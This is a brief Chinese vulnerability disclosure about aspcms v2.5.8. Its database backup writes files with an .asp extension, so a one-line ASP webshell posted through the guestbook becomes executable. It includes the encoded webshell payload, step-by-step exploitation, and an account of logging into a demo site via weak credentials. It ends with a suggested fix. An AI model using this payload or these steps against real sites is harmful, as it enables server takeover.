aspcms后台的备份逻辑存在严重的逻辑问题,可导致一句话木马被“引入”执行 众所周知,对以xxx.asp命名的access数据库,只要插入著名的一句话:
┼攠數畣整爠煥敵瑳∨≡┩愾
访问该asp即可得到webshell
aspcmsv2.5.8 最新版虽然对正在使用的数据库的名字加了#号,导致无法直接访问,但是数据库的备份功能却是直接把数据备份成了 xxx.asp 导致访问备份的数据库网址即可得到webshell
利用过程:
1、在站点前台留言本以 " ┼攠數畣整爠煥敵瑳∨≡┩愾 "做标题留言一则
2、利用我刚提交的aspcms爆后台路径以及http://demo.aspcms.com/ 的弱口令,我轻易的进入了后台。
3、利用后台的备份功能备份数据库,得到存在一句话木马的web地址,得到webshell
vcj0="javascript:errimg(this);" src="/uploadfile/Collfiles/20160201/20160201092344152.png" width="600" />
得到webshell,请看图:
解决方案:后台的备份,不应该自动生成可直接访问的asp文件。
|